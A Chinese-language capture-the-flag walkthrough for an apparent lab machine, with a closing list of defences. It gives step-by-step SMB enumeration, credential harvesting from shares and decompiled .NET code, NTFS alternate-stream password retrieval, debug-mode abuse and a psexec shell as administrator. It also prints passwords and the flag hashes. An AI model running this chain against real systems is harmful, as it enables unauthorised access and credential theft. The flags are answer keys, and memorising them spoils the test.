HQK Reporting Service 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用Nmap进行端口扫描，发现开放端口：<\/p>

445\/tcp (Microsoft-DS\/SMB)<\/li>

4386\/tcp (HQK Reporting Service V1.2)<\/li> <\/ul>

Nmap命令：<\/p>

nmap -p- 10.10.10.178 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>1.2 HQK Reporting Service分析<\/h3>
4386端口运行HQK Reporting Service V1.2，可用命令：<\/p>

LIST<\/li>
SETDIR <Directory_Name><\/li>
RUNQUERY <Query_ID><\/li>
DEBUG <\/li>
HELP <\/li>
<\/ul>
2. SMB服务枚举<\/h2>
2.1 匿名访问<\/h3>
尝试匿名访问SMB共享：<\/p>
smbmap -H 10.10.10.178 -u null
<\/span><\/span>smbclient -N \/\/10.10.10.178\/data
<\/span><\/span><\/code><\/pre>2.2 获取初始凭据<\/h3>
在Shared\/Templates\/HR\/Welcome Email.txt<\/code>中发现凭据：<\/p>

用户名: TempUser<\/li>
密码: welcome2019<\/li>
<\/ul>
2.3 使用凭据访问<\/h3>
使用获取的凭据访问SMB共享：<\/p>
smbmap -H 10.10.10.178 -u TempUser -p welcome2019
<\/span><\/span>smbclient -U TempUser \/\/10.10.10.178\/data
<\/span><\/span><\/code><\/pre>发现加密的配置文件IT\/Configs\/RU Scanner\/RU_config.xml<\/code><\/p>
3. Notepad++配置泄露<\/h2>
访问Secure$共享获取Notepad++配置：<\/p>
smbclient -U TempUser \/\/10.10.10.178\/Secure$
<\/span><\/span>cd IT\C<\/span>arl
<\/span><\/span>mget *
<\/span><\/span><\/code><\/pre>分析VB Projects中的代码VB Projects\/WIP\/RU\/RUScanner\/Module1.vb<\/code>，发现从XML配置文件加载配置信息的功能。<\/p>
4. dnSpy逆向分析<\/h2>
使用dnSpy工具分析.NET程序：<\/p>

下载dnSpy：https:\/\/github.com\/dnSpy\/dnSpy\/releases<\/li>
打开可执行文件进行分析<\/li>
<\/ol>
发现凭据：<\/p>

用户名: C.Smith<\/li>
密码: xRxRxPANCAK3SxRxRx<\/li>
<\/ul>
5. 权限提升<\/h2>
5.1 获取用户凭据<\/h3>
使用C.Smith凭据访问SMB：<\/p>
smbmap -H 10.10.10.178 -u C.Smith -p xRxRxPANCAK3SxRxRx
<\/span><\/span>smbclient -U C.Smith \/\/10.10.10.178\/users
<\/span><\/span><\/code><\/pre>获取user.txt：16c744bbc301be8fe8816169e1f29b78<\/p>
5.2 NTFS备用数据流(ADS)分析<\/h3>
检查Debug Mode Password.txt<\/code>的备用数据流：<\/p>
allinfo "C.Smith\/HQK Reporting\/Debug Mode Password.txt"<\/span>
<\/span><\/span><\/code><\/pre>发现备用数据流包含密码：<\/p>
get "Debug Mode Password.txt:Password"<\/span>
<\/span><\/span><\/code><\/pre>获取密码：WBQ201953D8w<\/p>
5.3 HQK Reporting Service调试<\/h3>
使用获取的密码进入调试模式：<\/p>
rlwrap telnet 10.10.10.178 4386<\/span>
<\/span><\/span>> debug WBQ201953D8w
<\/span><\/span>> SETDIR ..
<\/span><\/span>> LIST
<\/span><\/span>> SETDIR LDAP
<\/span><\/span>> showquery 2<\/span>
<\/span><\/span><\/code><\/pre>分析LDAP查询代码，发现配置文件格式：<\/p>
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip\/fKdeG\/kjEVb4=
<\/code><\/pre>
5.4 密码解密<\/h3>
分析代码发现密码使用CR.DS方法解密，解密后获得管理员密码：<\/p>

密码: XtH4nkS4Pl4y1nGX<\/li>
<\/ul>
6. 最终权限获取<\/h2>
使用psexec获取系统权限：<\/p>
impacket-psexec administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
<\/span><\/span><\/code><\/pre>获取root.txt：85d4497ec0807330257a23e9f866a599<\/p>
7. 关键知识点总结<\/h2>

SMB枚举<\/strong>：通过匿名访问获取初始凭据<\/li>
配置泄露<\/strong>：Notepad++配置和VB项目代码分析<\/li>
.NET逆向<\/strong>：使用dnSpy工具分析.NET程序<\/li>
NTFS ADS<\/strong>：利用备用数据流获取隐藏信息<\/li>
服务调试<\/strong>：HQK Reporting Service的调试功能利用<\/li>
密码解密<\/strong>：分析代码中的加密方法进行解密<\/li>
横向移动<\/strong>：使用获取的凭据进行权限提升<\/li>
<\/ol>
8. 防御建议<\/h2>

限制SMB共享的匿名访问<\/li>
避免在配置文件中存储明文或弱加密的凭据<\/li>
禁用不必要的调试功能<\/li>
定期审计NTFS备用数据流<\/li>
使用强密码和适当的加密方法<\/li>
限制服务账户的权限<\/li>
<\/ol>

HQK Reporting Service 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. SMB服务枚举<\/h2>

5. 权限提升<\/h2>

8. 防御建议<\/h2> 限制SMB共享的匿名访问<\/li> 避免在配置文件中存储明文或弱加密的凭据<\/li> 禁用不必要的调试功能<\/li> 定期审计NTFS备用数据流<\/li> 使用强密码和适当的加密方法<\/li> 限制服务账户的权限<\/li> <\/ol>

8. 防御建议<\/h2>

限制SMB共享的匿名访问<\/li>
避免在配置文件中存储明文或弱加密的凭据<\/li>
禁用不必要的调试功能<\/li>
定期审计NTFS备用数据流<\/li>
使用强密码和适当的加密方法<\/li>
限制服务账户的权限<\/li> <\/ol>